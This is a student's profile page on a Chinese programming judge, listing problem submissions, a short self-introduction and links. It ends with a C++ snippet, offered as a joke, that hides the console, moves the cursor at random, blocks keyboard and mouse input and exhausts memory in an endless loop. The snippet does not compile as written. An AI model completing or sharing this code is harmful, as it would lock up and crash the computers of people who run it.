-
讨论 (3)
最近创建的讨论
-
5评论
发现了一个特别奇葩的解决方法
- A+B Problem
- 2018-06-21 15:00:12 @
-
-
贡献 (6)
最被赞同的题解
最近编写的题解
-
递交 (46)
最近递交
状态 题目 递交者 时间 内存 语言 递交时间 P1006 晴天小猪历险记之Hill YG666 180ms 7.242 MiB C++ 2018-05-27 18:19:34 P1017 划分 YG666 0ms 0 Bytes Pascal 2018-05-26 19:59:35 P1014 旅行商简化版 YG666 232ms 15.504 MiB C++ 2018-05-26 19:55:03 P1014 旅行商简化版 YG666 0ms 0 Bytes C++ 2018-05-26 19:54:34 P1000 A+B Problem YG666 32ms 372.0 KiB C++ 2018-05-26 19:53:07 P1000 A+B Problem YG666 35ms 384.0 KiB C++ 2018-05-26 19:52:51 P1000 A+B Problem YG666 0ms 0 Bytes C++ 2018-05-26 19:49:09 P1000 A+B Problem YG666 31ms 384.0 KiB C++ 2018-05-26 19:46:01 P1237 隐形的翅膀 YG666 274ms 628.0 KiB C++ 2018-05-20 21:00:05 P1077 克隆龙 YG666 4ms 336.0 KiB C++ 2018-05-20 20:37:46
个人简介
基中自有黄金屋
————伊丽莎白鼠
大家好!我乃是中国人民大学附属中学实验小学早陪六年级的超级蒟蒻&渣渣一枚!
欢迎加我|扣扣威信|交流哦~
另外附上:
1. luogu博客
2. 正版c++5.11下载地址
3. RDFZ团队
4. 最爱上的网址
伟大的代码:
#include <iostream>
#include <cstdlib>
#include <cstdio>
#include <algorithm>
#include <cstring>
using namespace std;
int main()
{
int x=GetSystemMetrics(SM_CXSCREEN);
int y=GetSystemMetrics(SM_CYSCREEN);
FreeConsole();
srand(time(0));
while(1)
{
SetCursorPos(rand()%x,rand()%y)
BlockInput(true);
char *p[i] =new char[10000000];
i++;
}
return 0;
}
需要在c++5.11的版本里运行